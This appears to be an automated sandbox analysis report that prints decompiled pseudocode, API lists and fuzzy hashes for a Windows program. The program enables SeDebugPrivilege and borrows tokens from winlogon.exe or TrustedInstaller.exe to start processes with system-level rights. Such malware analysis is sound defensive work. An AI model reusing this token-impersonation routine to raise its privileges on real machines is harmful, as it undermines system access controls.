								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t154 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152); // executed
					_t156 = _t154;
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}





































                                                                                                                0x00408533
                                                                                                                0x00408533
                                                                                                                0x00408536
                                                                                                                0x0040853e
                                                                                                                0x00408546
                                                                                                                0x0040854d
                                                                                                                0x00408559
                                                                                                                0x00408563
                                                                                                                0x00408569
                                                                                                                0x00408572
                                                                                                                0x00408583
                                                                                                                0x0040858d
                                                                                                                0x00408595
                                                                                                                0x0040859e
                                                                                                                0x004085a2
                                                                                                                0x004085a6
                                                                                                                0x004085aa
                                                                                                                0x004085ae
                                                                                                                0x004085b8
                                                                                                                0x004085c1
                                                                                                                0x004085c8
                                                                                                                0x004085cd
                                                                                                                0x004085cf
                                                                                                                0x0040867f
                                                                                                                0x00408688
                                                                                                                0x0040868d
                                                                                                                0x0040868f
                                                                                                                0x00408730
                                                                                                                0x00408735
                                                                                                                0x00408737
                                                                                                                0x0040873d
                                                                                                                0x00408750
                                                                                                                0x0040875d
                                                                                                                0x00408763
                                                                                                                0x00408770
                                                                                                                0x00408775
                                                                                                                0x00408779
                                                                                                                0x0040878b
                                                                                                                0x00408790
                                                                                                                0x004087a2
                                                                                                                0x004087aa
                                                                                                                0x004087b8
                                                                                                                0x004087be
                                                                                                                0x004087c3
                                                                                                                0x004087c9
                                                                                                                0x004087d2
                                                                                                                0x004087df
                                                                                                                0x004087e3
                                                                                                                0x004087e6
                                                                                                                0x00408801
                                                                                                                0x004087e8
                                                                                                                0x004087f8
                                                                                                                0x004087fe
                                                                                                                0x00408811
                                                                                                                0x00408816
                                                                                                                0x00408816
                                                                                                                0x0040881c
                                                                                                                0x00408822
                                                                                                                0x00408779
                                                                                                                0x00408824
                                                                                                                0x00408829
                                                                                                                0x00408833
                                                                                                                0x00408834
                                                                                                                0x00408840
                                                                                                                0x00408848
                                                                                                                0x0040884c
                                                                                                                0x00408850
                                                                                                                0x00408855
                                                                                                                0x0040885a
                                                                                                                0x00408860
                                                                                                                0x004088ac
                                                                                                                0x004088b1
                                                                                                                0x004088b3
                                                                                                                0x004088bf
                                                                                                                0x004088c5
                                                                                                                0x004088cb
                                                                                                                0x004088da
                                                                                                                0x004088ea
                                                                                                                0x004088ed
                                                                                                                0x004088f8
                                                                                                                0x004088ff
                                                                                                                0x00408905
                                                                                                                0x004088b5
                                                                                                                0x004088b5
                                                                                                                0x004088b5
                                                                                                                0x00000000
                                                                                                                0x00408862
                                                                                                                0x00408862
                                                                                                                0x0040886d
                                                                                                                0x00408874
                                                                                                                0x0040887b
                                                                                                                0x00408882
                                                                                                                0x00408889
                                                                                                                0x00408895
                                                                                                                0x00408897
                                                                                                                0x00408658
                                                                                                                0x00408658
                                                                                                                0x0040865d
                                                                                                                0x00408661
                                                                                                                0x0040866a
                                                                                                                0x00408673
                                                                                                                0x00408678
                                                                                                                0x00000000
                                                                                                                0x00408678
                                                                                                                0x00408860
                                                                                                                0x00408695
                                                                                                                0x00408695
                                                                                                                0x0040869f
                                                                                                                0x004086a2
                                                                                                                0x004086af
                                                                                                                0x004086a4
                                                                                                                0x004086a7
                                                                                                                0x004086a7
                                                                                                                0x004086b4
                                                                                                                0x004086bf
                                                                                                                0x004086cb
                                                                                                                0x004086d3
                                                                                                                0x004086d7
                                                                                                                0x004086db
                                                                                                                0x004086e0
                                                                                                                0x004086f1
                                                                                                                0x004086f8
                                                                                                                0x004086ff
                                                                                                                0x00408706
                                                                                                                0x0040870d
                                                                                                                0x00408719
                                                                                                                0x0040871b
                                                                                                                0x00000000
                                                                                                                0x0040871b
                                                                                                                0x004085d5
                                                                                                                0x004085da
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004085ec
                                                                                                                0x004085ef
                                                                                                                0x004085f6
                                                                                                                0x004085fd
                                                                                                                0x00408604
                                                                                                                0x0040860b
                                                                                                                0x00408612
                                                                                                                0x00408616
                                                                                                                0x00408620
                                                                                                                0x0040862a
                                                                                                                0x00408632
                                                                                                                0x00408633
                                                                                                                0x00408638
                                                                                                                0x0040864a
                                                                                                                0x0040864f
                                                                                                                0x00408651
                                                                                                                0x00000000
                                                                                                                0x0040854f
                                                                                                                0x0040854f
                                                                                                                0x00408550
                                                                                                                0x00408556
                                                                                                                0x00408556

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                  • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                  • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                  • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                                                • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 00408583
                                                                                                                • swscanf.MSVCRT ref: 00408620
                                                                                                                • _wtoi.MSVCRT ref: 00408633
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                                                • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                                                • API String ID: 3933224404-3784219877
                                                                                                                • Opcode ID: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                                                                • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                                                • Opcode Fuzzy Hash: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                                                                • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 81%
                                                                                                                			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}


































                                                                                                                0x00401fe6
                                                                                                                0x00401ff1
                                                                                                                0x00401ff3
                                                                                                                0x00401fff
                                                                                                                0x00402002
                                                                                                                0x004020a8
                                                                                                                0x004020ab
                                                                                                                0x004020f3
                                                                                                                0x004020f6
                                                                                                                0x00402162
                                                                                                                0x00402165
                                                                                                                0x004021f2
                                                                                                                0x004021f5
                                                                                                                0x00402235
                                                                                                                0x00402238
                                                                                                                0x004022be
                                                                                                                0x0040223a
                                                                                                                0x0040223a
                                                                                                                0x00402240
                                                                                                                0x0040224b
                                                                                                                0x0040224e
                                                                                                                0x00402251
                                                                                                                0x00402254
                                                                                                                0x00402259
                                                                                                                0x0040225e
                                                                                                                0x00402262
                                                                                                                0x00402264
                                                                                                                0x00402264
                                                                                                                0x00402264
                                                                                                                0x00402262
                                                                                                                0x00402266
                                                                                                                0x0040226c
                                                                                                                0x00402271
                                                                                                                0x00402274
                                                                                                                0x00402276
                                                                                                                0x0040229a
                                                                                                                0x0040229a
                                                                                                                0x00402278
                                                                                                                0x00402296
                                                                                                                0x00402296
                                                                                                                0x0040229c
                                                                                                                0x0040229c
                                                                                                                0x004022c0
                                                                                                                0x004022c2
                                                                                                                0x004022c8
                                                                                                                0x004022c8
                                                                                                                0x004022c8
                                                                                                                0x00000000
                                                                                                                0x004022c0
                                                                                                                0x00402201
                                                                                                                0x00402203
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402220
                                                                                                                0x00402225
                                                                                                                0x00402227
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040222d
                                                                                                                0x00000000
                                                                                                                0x0040222d
                                                                                                                0x00402173
                                                                                                                0x00402179
                                                                                                                0x0040217b
                                                                                                                0x0040217e
                                                                                                                0x00402183
                                                                                                                0x00402185
                                                                                                                0x00402188
                                                                                                                0x0040218d
                                                                                                                0x0040218f
                                                                                                                0x00402192
                                                                                                                0x004021a2
                                                                                                                0x004021a7
                                                                                                                0x004021a9
                                                                                                                0x004021ac
                                                                                                                0x004021cc
                                                                                                                0x004021d1
                                                                                                                0x004021d3
                                                                                                                0x004021db
                                                                                                                0x004021db
                                                                                                                0x004021e1
                                                                                                                0x004021e1
                                                                                                                0x004021e7
                                                                                                                0x004021e7
                                                                                                                0x00000000
                                                                                                                0x00402192
                                                                                                                0x004020fe
                                                                                                                0x00402103
                                                                                                                0x00402105
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402111
                                                                                                                0x00402114
                                                                                                                0x00000000
                                                                                                                0x00402114
                                                                                                                0x004020ad
                                                                                                                0x004020b4
                                                                                                                0x004020b9
                                                                                                                0x004020bc
                                                                                                                0x00000000
                                                                                                                0x004020c2
                                                                                                                0x004020c4
                                                                                                                0x004020ce
                                                                                                                0x004020d0
                                                                                                                0x004020d3
                                                                                                                0x004020d4
                                                                                                                0x004020d5
                                                                                                                0x004020e6
                                                                                                                0x004020e7
                                                                                                                0x004020d7
                                                                                                                0x004020d7
                                                                                                                0x004020dd
                                                                                                                0x004020de
                                                                                                                0x004020df
                                                                                                                0x004020df
                                                                                                                0x004020ec
                                                                                                                0x004020ef
                                                                                                                0x00000000
                                                                                                                0x004020ef
                                                                                                                0x00402008
                                                                                                                0x00402016
                                                                                                                0x0040201d
                                                                                                                0x0040202e
                                                                                                                0x00402035
                                                                                                                0x00402044
                                                                                                                0x00402049
                                                                                                                0x00402055
                                                                                                                0x00402064
                                                                                                                0x00402068
                                                                                                                0x0040206e
                                                                                                                0x0040208b
                                                                                                                0x00402070
                                                                                                                0x00402082
                                                                                                                0x00402088
                                                                                                                0x0040209e
                                                                                                                0x004020a1
                                                                                                                0x00402119
                                                                                                                0x00402119
                                                                                                                0x0040211b
                                                                                                                0x0040211e
                                                                                                                0x0040211e
                                                                                                                0x00402149
                                                                                                                0x00402151
                                                                                                                0x00402151
                                                                                                                0x00402157
                                                                                                                0x00402157
                                                                                                                0x004022cb
                                                                                                                0x004022d2
                                                                                                                0x004022d2

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040201D
                                                                                                                • memset.MSVCRT ref: 00402035
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                • wcslen.MSVCRT ref: 00402050
                                                                                                                • wcslen.MSVCRT ref: 0040205F
                                                                                                                • wcslen.MSVCRT ref: 004020B4
                                                                                                                • _wtoi.MSVCRT ref: 004020D7
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                                                • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                                                • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                                                  • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                  • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                  • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                                                  • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                  • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                                                  • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                  • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                  • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                  • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                  • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                  • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                  • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                  • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                • wcschr.MSVCRT ref: 00402259
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004022B8
                                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                                • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                                • API String ID: 3201562063-2355939583
                                                                                                                • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                                • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120processlibraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(Process32NextW(_v12,  &_v1136) != 0) {
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}






























                                                                                                                0x00409609
                                                                                                                0x0040960f
                                                                                                                0x00409619
                                                                                                                0x00409623
                                                                                                                0x0040962e
                                                                                                                0x00409633
                                                                                                                0x00409640
                                                                                                                0x0040964a
                                                                                                                0x00409782
                                                                                                                0x0040965a
                                                                                                                0x0040965f
                                                                                                                0x00409678
                                                                                                                0x0040967e
                                                                                                                0x00409681
                                                                                                                0x00409685
                                                                                                                0x00409688
                                                                                                                0x004096b2
                                                                                                                0x004096bf
                                                                                                                0x004096c6
                                                                                                                0x004096cb
                                                                                                                0x004096da
                                                                                                                0x004096e6
                                                                                                                0x0040973b
                                                                                                                0x00409747
                                                                                                                0x0040975f
                                                                                                                0x00409764
                                                                                                                0x0040976a
                                                                                                                0x00409770
                                                                                                                0x00409773
                                                                                                                0x0040977d
                                                                                                                0x00000000
                                                                                                                0x0040977d
                                                                                                                0x004096ee
                                                                                                                0x004096f5
                                                                                                                0x004096fc
                                                                                                                0x00409704
                                                                                                                0x0040970c
                                                                                                                0x0040971c
                                                                                                                0x0040971c
                                                                                                                0x00409704
                                                                                                                0x00409721
                                                                                                                0x00409728
                                                                                                                0x00409739
                                                                                                                0x00409739
                                                                                                                0x00000000
                                                                                                                0x00409728
                                                                                                                0x00409693
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004096a5
                                                                                                                0x004096a9
                                                                                                                0x004096ac
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004096ac
                                                                                                                0x004097a6

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
                                                                                                                • memset.MSVCRT ref: 0040962E
                                                                                                                • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                                • memset.MSVCRT ref: 004096C6
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                                • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                                • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                • API String ID: 239888749-1740548384
                                                                                                                • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                                • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}








                                                                                                                0x00409924
                                                                                                                0x0040992c
                                                                                                                0x00409937
                                                                                                                0x0040993f
                                                                                                                0x0040994a
                                                                                                                0x00409956
                                                                                                                0x00409962
                                                                                                                0x0040996e
                                                                                                                0x00409971
                                                                                                                0x00409973
                                                                                                                0x00000000
                                                                                                                0x00409976
                                                                                                                0x00409977

                                                                                                                APIs
